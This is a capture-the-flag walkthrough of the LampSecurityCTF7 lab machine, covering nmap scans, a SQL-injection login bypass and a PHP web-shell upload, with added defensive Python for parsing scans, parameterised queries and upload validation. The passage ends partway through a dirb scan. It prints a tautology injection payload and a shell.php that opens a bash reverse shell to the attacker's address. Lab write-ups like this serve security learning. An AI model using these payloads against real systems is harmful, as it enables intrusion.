LampSecurityCTF7 machine penetration (SQL injection, file upload, password spraying)

Machine introduction

LampSecurityCTF7, a vulnhub machine

Host discovery

Because of a configuration issue in the machine image, its IP does not show up in a scan.

Pay special attention here: the first time you start the machine, VMware pops up a dialog asking whether you copied or moved the virtual machine. Be sure to choose "I moved it"; moving reproduces the network environment completely. Otherwise the machine may not be found during host discovery. If host discovery really does fail later on, don't panic, just reinstall it.
(https://blog.youkuaiyun.com/Bossfrank/article/details/131324929)

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.50.0/24
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:32 CST
Nmap scan report for 192.168.50.1
Host is up (0.00016s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.50.134
Host is up (0.00011s latency).
MAC Address: 00:0C:29:83:4F:85 (VMware)
Nmap scan report for 192.168.50.156
Host is up (0.000081s latency).
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Nmap scan report for 192.168.50.254
Host is up (0.00013s latency).
MAC Address: 00:50:56:EC:05:7B (VMware)
Nmap scan report for 192.168.50.147
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.90 seconds


┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.50.156                                       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:42 CST
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00044s latency).
Not shown: 65505 filtered tcp ports (no-response), 21 filtered tcp ports (host-prohibited)
PORT      STATE  SERVICE
22/tcp    open   ssh
80/tcp    open   http
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
901/tcp   open   samba-swat
5900/tcp  closed vnc
8080/tcp  open   http-proxy
10000/tcp open   snet-sensor-mgmt
MAC Address: 00:0C:29:9D:12:A9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds
                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p22,80,137,138,139,901,5900,8080,10000 192.168.50.156      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:46 CST
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00042s latency).

PORT      STATE  SERVICE     VERSION
22/tcp    open   ssh         OpenSSH 5.3 (protocol 2.0)
80/tcp    open   http        Apache httpd 2.2.15 ((CentOS))
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
901/tcp   open   http        Samba SWAT administration server
5900/tcp  closed vnc
8080/tcp  open   http        Apache httpd 2.2.15 ((CentOS))
10000/tcp open   http        MiniServ 1.610 (Webmin httpd)
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Aggressive OS guesses: Linux 2.6.32 - 3.13 (97%), Linux 2.6.39 (96%), Linux 2.6.32 - 3.10 (94%), Linux 2.6.32 (92%), Linux 3.2 - 3.8 (92%), Linux 2.6.22 - 2.6.36 (91%), Linux 3.10 - 4.11 (91%), Tandberg Video Conference System (91%), Linux 2.6.32 - 3.1 (91%), Linux 2.6.32 - 2.6.39 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.89 seconds
                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --min-rate 1000 -p- 192.168.50.156                           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:49 CST
Warning: 192.168.50.156 giving up on port because retransmission cap hit (10).
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00039s latency).
All 65535 scanned ports on bogon (192.168.50.156) are in ignored states.
Not shown: 64800 open|filtered udp ports (no-response), 735 filtered udp ports (host-prohibited)
MAC Address: 00:0C:29:9D:12:A9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 719.01 seconds
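To turn the scans above into something a defender can act on, here is an added Python example (not from the original post) that parses nmap's normal output, the format shown above, into a port table and flags open services whose banner is older than a review threshold. The sample text is constructed from a few lines of the -sV scan above; the minimum-version table is an assumption made for illustration, not an authoritative end-of-life list.

```python
import re

# Constructed sample in the shape of nmap's normal (-sV) output shown on this page.
SAMPLE_NMAP = """\
PORT      STATE  SERVICE     VERSION
22/tcp    open   ssh         OpenSSH 5.3 (protocol 2.0)
80/tcp    open   http        Apache httpd 2.2.15 ((CentOS))
137/tcp   closed netbios-ns
139/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
901/tcp   open   http        Samba SWAT administration server
10000/tcp open   http        MiniServ 1.610 (Webmin httpd)
MAC Address: 00:0C:29:9D:12:A9 (VMware)
"""

# One port line: "<port>/<proto>  <state>  <service>  [<version text>]"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)

# Assumed review thresholds (product banner prefix -> minimum (major, minor)).
MIN_VERSIONS = {"OpenSSH": (7, 0), "Apache httpd": (2, 4), "MiniServ": (2, 0)}


def parse_nmap(text):
    """Return one dict per port line found in nmap normal output."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            row = m.groupdict()
            row["port"] = int(row["port"])
            row["version"] = (row["version"] or "").strip()
            rows.append(row)
    return rows


def open_ports(rows):
    """Ports reported as open, in scan order."""
    return [r["port"] for r in rows if r["state"] == "open"]


def version_tuple(text):
    """'2.2.15' -> (2, 2); only major and minor are compared."""
    return tuple(int(x) for x in text.split(".")[:2])


def flag_outdated(rows):
    """(port, banner) for open services whose version is below the assumed minimum."""
    flagged = []
    for r in rows:
        if r["state"] != "open":
            continue
        for product, minimum in MIN_VERSIONS.items():
            if r["version"].startswith(product):
                m = re.search(r"\d+(?:\.\d+)*", r["version"][len(product):])
                if m and version_tuple(m.group()) < minimum:
                    flagged.append((r["port"], r["version"]))
    return flagged


if __name__ == "__main__":
    rows = parse_nmap(SAMPLE_NMAP)
    print("open:", open_ports(rows))
    for port, banner in flag_outdated(rows):
        print(f"review port {port}: {banner}")
```

The parser only reads the port table; the MAC and header lines are ignored because they do not match the port pattern. Comparing just major and minor keeps the threshold table short; a real inventory check would key on the exact version and a maintained advisory feed instead.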


Vulnerability script scan (the scan is very slow, not sure why)

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,137,138,139,901,5900,8080,10000 192.168.50.156
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 11:32 CST
Stats: 0:26:52 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 96.80% done; ETC: 12:00 (0:00:53 remaining)
Stats: 0:35:53 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.34% done; ETC: 12:09 (0:00:59 remaining)
Stats: 0:43:13 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.22% done; ETC: 12:16 (0:00:47 remaining)
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00030s latency).

PORT      STATE  SERVICE
22/tcp    open   ssh
80/tcp    open   http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
901/tcp   open   samba-swat
5900/tcp  closed vnc
8080/tcp  open   http-proxy
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
| http-enum: 
|_  /login.php: Possible admin folder
10000/tcp open   snet-sensor-mgmt
MAC Address: 00:0C:29:9D:12:A9 (VMware)

Host script results:
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
| smb-vuln-cve2009-3103: 
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|           
|     Disclosure date: 2009-09-08
|     References:
|       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms06-025: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: false
|_samba-vuln-cve-2012-1182: SMB: Failed to receive bytes: EOF
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 3316.13 seconds


Web penetration

[screenshot] Try injection.
[screenshot]
Tried injecting on port 8080 and it didn't work; the comment syntax for this database version seems to be the problem. There is an error message, worth a look.
[screenshot] Injecting this way works.
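The login bypass above works because the form input is pasted into the SQL text, so a quote in the input closes the string and the rest is parsed as SQL. As an added example (not the CTF application's code, which the post does not show), here is a Python/sqlite3 mock of the same login check in two forms: the string-built query that a tautology payload bypasses, and the parameterised query that receives the identical input as plain data. The users table, the sha256 password hashing and the credentials are all constructed for the demo.

```python
import hashlib
import sqlite3


def make_db():
    """Constructed in-memory users table standing in for the app's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.execute(
        "INSERT INTO users VALUES (?, ?)",
        ("admin", hashlib.sha256(b"correct horse").hexdigest()),
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the SQL by concatenation: the username becomes SQL syntax.

    With username = "admin' OR '1'='1" the statement becomes
      ... WHERE username = 'admin' OR '1'='1' AND password_hash = '<hash>'
    and AND binds tighter than OR, so the row is returned regardless of the
    password.
    """
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    sql = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password_hash = '" + pw_hash + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: the driver binds the input as data, never as SQL."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password_hash = ?",
        (username, pw_hash),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "admin' OR '1'='1"
    print("vulnerable, wrong password:", login_vulnerable(db, payload, "wrong"))
    print("safe, wrong password:      ", login_safe(db, payload, "wrong"))
    print("safe, right password:      ", login_safe(db, "admin", "correct horse"))
```

The comment-syntax differences the post ran into (what a given database accepts after `--` or `#`) only matter for the concatenated version; a bound parameter never reaches the SQL parser as syntax, so the fix is the same whatever the database version. The sha256 here stands in for the app's own password handling and is not a recommendation for storing passwords.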
[screenshot] There is an upload feature; consider uploading a web shell.

[screenshot]

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ vim shell.php    
                                                                                                                                                           
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat shell.php          
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.50.147/1234 0>&1'"); ?>
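The upload form accepts shell.php exactly as written above. As an added defensive example (not the CTF application's upload code, which the post does not show), here is a Python validator for an image upload endpoint applying the checks that would have rejected that file: an allowlist on the last extension, a magic-byte check on the body, a scan for a PHP open tag anywhere in the content, and a server-generated filename so the client's name (double extensions included) never reaches disk. The sample uploads are constructed byte strings.

```python
import os
import re
import secrets

# Allowed extensions and the magic bytes a file of that type must start with.
ALLOWED_EXT = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# A PHP open tag inside an otherwise valid image still runs if the server ever
# hands the file to PHP, so the whole body is scanned, not just the start.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
MAX_BYTES = 2 * 1024 * 1024


class UploadRejected(ValueError):
    pass


def validate_upload(filename, data):
    """Return a safe server-side filename, or raise UploadRejected.

    Order of checks: size, last extension against the allowlist (shell.php is
    rejected here), magic bytes matching that extension, then the PHP-tag scan.
    The stored name is random with the verified extension, so a name such as
    shell.php.png loses its double extension even when the body is a real PNG.
    """
    if len(data) > MAX_BYTES:
        raise UploadRejected("too large")
    base = os.path.basename(filename)
    parts = base.lower().rsplit(".", 1)
    if len(parts) != 2 or parts[1] not in ALLOWED_EXT:
        raise UploadRejected("extension not allowed")
    ext = parts[1]
    if not data.startswith(ALLOWED_EXT[ext]):
        raise UploadRejected("content does not match extension")
    if PHP_TAG.search(data):
        raise UploadRejected("embedded PHP tag")
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed sample uploads: name -> body bytes.
SAMPLES = {
    "shell.php": b"<?php phpinfo(); ?>",
    "photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
    "sneaky.png": b"\x89PNG\r\n\x1a\n" + b"<?php phpinfo(); ?>",
    "fake.png": b"<?php phpinfo(); ?>",
}


def check_all(samples):
    """Run the validator over name -> bytes and return name -> outcome string."""
    results = {}
    for name, data in samples.items():
        try:
            validate_upload(name, data)
            results[name] = "accepted"
        except UploadRejected as exc:
            results[name] = str(exc)
    return results


if __name__ == "__main__":
    for name, outcome in check_all(SAMPLES).items():
        print(f"{name:12} {outcome}")
```

Validation alone is half of the fix: the directory the files land in (the post finds it under asset) should also be served without a PHP handler, so that even a file that slips past these checks is returned as bytes rather than executed.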
   

Next step: find where shell.php was stored and have it connect back to kali with a shell.
Scan directories; the uploaded file shows up under asset.

┌──(kali㉿kali)-[~]
└─$ sudo dirb http://192.168.50.156/                                              
[sudo] password for kali: 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Sep 27 13:54:34 2024
URL_BASE: http://192.168.